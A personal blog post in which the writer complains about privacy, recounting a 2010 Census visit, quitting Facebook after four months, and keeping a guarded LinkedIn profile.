Last year the feds conducted an anonymous survey to gauge the US population to know how to distribute resources to different communities. The Census seemed like an absolutely rediculous invasion of privacy in my opinion.. I pay taxes, you know who I am, where I live, who I'm married to and how many children I do or do not have, why the 'anonymous' survey? I decided to say screw it & not fill out the Census form. Sure the TV told me it was important and 'required' but it also said the survey was 'completely anonymous' so how would they know if I'd even filled it out or not? Well, two weeks later I nice woman came knocking on my door asking me all sorts of personal questions from the census committee. I was not pleased to say the least but felt cornered. When I'd asked how she found me if the census was anonymous the lady looked at me like I was a nut-job. Whatever.. you want to ask me questions, go ahead.. So I went along with it and started answering her questions.. The first thing she asked me for was my name.. Really? Do you not see the problem with an anonymous survey asking for your name... And I'm the crazy one right?

In August 2010 I also decided to try out the whole FaceBook craze for the first time; up until then I had NEVER had an account- I'd held out as long as possible but against my better judgement I signed up for an account. Within a few weeks I was tracking down everyone I could think of. It was kindof a sick obsession I suppose... People I went to high school with, friends from my childhood, people I'd met on vacation.. Of course it was nice keeping in touch with family that I hadn't seen or spoken with in a long time but then again, those same family members never once picked up the telephone to call me and say hello. Half of them didn't even come to my wedding so why did I want to be connected to them so badly online? It seemed like a game - how many 'friends' could I have, did I have more than other people? Look, I just got a puppy, here's his picture. Oh, I went on a cruise, check out the scenery.. After a few months it occurred to me that FaceBook was an extremely bad idea. People are haters - half the 'friends' I'd hooked up with were simply using FaceBook to glean information for their gossip circles and the other half really didn't care what was going on in my life.

So, after just 4 months, I decided to permanently close my FaceBook account- it was my New Year resolution and I'm proud to say that today, I'm 282 days sober. Not a single relapse.. I gotta admit I really wasn't sure if I was going to miss it but looking back, I now see how much more productive and private my life is. Sure my friends and family are still all on there but I really don't care. I still keep in touch with everyone that matters so what difference does it make... Something about having a database full of peoples real names, photos and contacts just doesn't sit right with me.

I suppose I'm a bit of a hypocrite for having a LinkedIn account.. but in my defense, that actually does have legitimate uses. I've gotten my last 2 jobs through LinkedIn. I think of it more as an online resume than social media site however I'm sure others out there would disagree. At least with LinkedIn I can remain somewhat hidden though as I refuse to post a real picture of myself and rarely add people I haven't actually done business with.

It'll be interesting to see if people start wising up to their lack of privacy. You see stories on the news every once in a while about it but I doubt most people take them seriously. I'm still convinced that someone will eventually figure out how to leverage social media for illicit purpose if they haven't already. Ok.. enough ranting, thats all for today.